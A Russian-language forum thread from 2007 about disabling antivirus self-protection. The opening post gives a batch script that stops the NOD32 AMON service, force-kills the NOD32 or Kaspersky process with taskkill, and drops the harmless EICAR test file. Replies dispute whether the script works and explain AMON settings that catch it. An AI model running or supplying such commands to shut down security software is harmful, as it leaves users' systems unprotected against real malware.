day & night

Как сломали NOD32, BitDefendre и BullGuard, Видео о том как вынесли вышеперечисленне
Дата обновления: , перейти к новому сообщению
#1
KJIACTEP



Unregistered














Нарыл ссылочку в инете, на видюху о том как вынесли с помощью простого батника НОД32, битдефендер, буллгуард со включённой самозащитой. Попробывали вынести этим же макаром каспер, неполучилось. Когда у него включена самозащита то ему как по видео так и в моих пробах всё пофиг. Представляю ссылки:

Kasper 7.0 vs NOD32-
http://rapidshare.com...070/1.rar.html (4 Мб)

BullGuard vs Kasper-
http://rapidshare.com...s_KIS.rar.html

А теперь гвоздь вбитый в программу НОД32-
http://rapidshare.com...s_KIS.rar.html
------

Кому интересно, тот сам может попробывать вынести НОД32. Точнее останавливаеться служаб амон кажетсья, а иногда даже выноситься сам НОД. А точнее всегда выноситься. Просто создаём текстовик, суём в него эту инфу:

start net stop amon
taskkill /IM nod32krn.exe /F /T
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*> eicar.com
eicar.com

потом "Сохранить как" -> "все файлы" имя задаём например NOD32VSKIS.bat обязательно нужно написать .bat

потмо при врубленном ноде врубаем батник и... трындец...

Пробуем то же самое тока код меняем на:

start net stop amon
taskkill /IM avp.exe /F /T
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*> eicar.com
eicar.com

Вообщем смотрим smile.gif
Go topGo end

Ответов(1 - 9)
8.06.2007 - 19:45
#2
Zheny



Специалист
****

Группа: Пользователи
Сообщений: 346
Регистрация: 11.03.2007
Из: /home/zheny
Пользователь №: 353.770


Респектов: 46
-----X----


Предупреждений: 0


QUOTE
Кому интересно, тот сам может попробывать вынести НОД32. Точнее останавливаеться служаб амон кажетсья, а иногда даже выноситься сам НОД. А точнее всегда выноситься. Просто создаём текстовик, суём в него эту инфу:

start net stop amon
taskkill /IM nod32krn.exe /F /T
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*> eicar.com
eicar.com

потом "Сохранить как" -> "все файлы" имя задаём например NOD32VSKIS.bat обязательно нужно написать .bat

потмо при врубленном ноде врубаем батник и... трындец...

Ну и как понимать то, что НОД сразу же отреагировал не хуже Каспера??? mad.gif Очередная реклама всемогущего Касперского??
З.Ы. Может прежде чем писать, стоит самому проверить достоверность информации?? shot.gif
User is offline
Go topGo end
8.06.2007 - 20:28
#3
KJIACTEP



Unregistered














Эм... ты видео смотрел? батник выбивает нода из процессов, и создаёт ехе шник эикара на рабочем столе и ноде его не ловит.
Go topGo end
8.06.2007 - 20:30
#4
Zheny



Специалист
****

Группа: Пользователи
Сообщений: 346
Регистрация: 11.03.2007
Из: /home/zheny
Пользователь №: 353.770


Респектов: 46
-----X----


Предупреждений: 0


В том то и дело, что смотрел. И даже повторил трюк, и ничего не выбило
При попытке запустить бат нод его словил
User is offline
Go topGo end
9.06.2007 - 2:10
#5
Pascaller



профи!
Group Icon

Группа: Наши Люди
Сообщений: 812
Регистрация: 6.11.2005
Пользователь №: 63.770


Респектов: 148
-----X----




Не забывайте что антивирусники обновляются и НОД32 не исключение, а видео возможно уже старое, вот вы и спорите smile.gif
User is offline
Go topGo end
9.06.2007 - 2:34
#6
SLIDER



Made In Formula1
[SoftoRooMTeaM] Group Icon

Группа: СуперМодераторы
Сообщений: 5.724
Регистрация: 5.12.2005
Из: Н.Новгород
Пользователь №: 666


Респектов: 1444
-----XXXXX




О чём спор непонятно! Народ сломать можно всё! Идеальной защиты нет и небудет.

NOD и Каспер хорошие антивирусы, но обходятся на ура, новые вирусы невидят пока им не пришлют на них сигнатуру. Ну и кто кого спрашивается???

Кому надо тот всегда найдёт дорожку к в вашим КалькуляторАм типа PC.....и вам никто и ничего не поможет....
User is offline
Go topGo end
9.06.2007 - 7:12
#7
Quim2005



профи!
Group Icon

Группа: Наши Люди
Сообщений: 1.145
Регистрация: 19.01.2006
Из: Россия, г.Набережные Челны
Пользователь №: 111.013


Респектов: 314
-----XX---




Согласен со SLIDER. Любой антивирус можно ломануть и обойти, тем более если вы с правами администратора. Но с другой стороны, почему я с этим правами не могу удалить антивирус? По всем законам должен, просто надо нормально организовывать права пользователей и не давать им администраторских прав.
User is offline
Go topGo end
26.06.2007 - 22:06
#8
Borispetrovi4



Бывалый
*

Группа: Пользователи
Сообщений: 18
Регистрация: 18.09.2006
Пользователь №: 230.620


Респектов: 1
-----X----


Предупреждений: 1


Zheka4

а у меня Nod не отреагировал... а почему не знаю... может что подскажеш?
User is offline
Go topGo end
26.06.2007 - 22:16
#9
Zheny



Специалист
****

Группа: Пользователи
Сообщений: 346
Регистрация: 11.03.2007
Из: /home/zheny
Пользователь №: 353.770


Респектов: 46
-----X----


Предупреждений: 0


Borispetrovi4 В настройках модуля AMON поставь галочку сканировать файлы при создании, и на вкладке методы выбери все методы сканирования. И конечно не забудь обновить базы и сам антивирь.
User is offline
Go topGo end
7.08.2007 - 7:22
#10
Calabus



Unregistered














Вся приколюха в том, что када жмёшь в винде три пидали, то можно удалить НОД32 из процессов без всяких трудностей, поэтому он так легко и ломается, а вот Каспера так не срубишь, при попытке вырубить процесс он матерится и грит что ФИГ ВАМ доступ запрещён. Вот так вот...
Go topGo end

Topic Options
Сейчас: 14.05.2024 - 15:58
Мобильная версия | Lite версия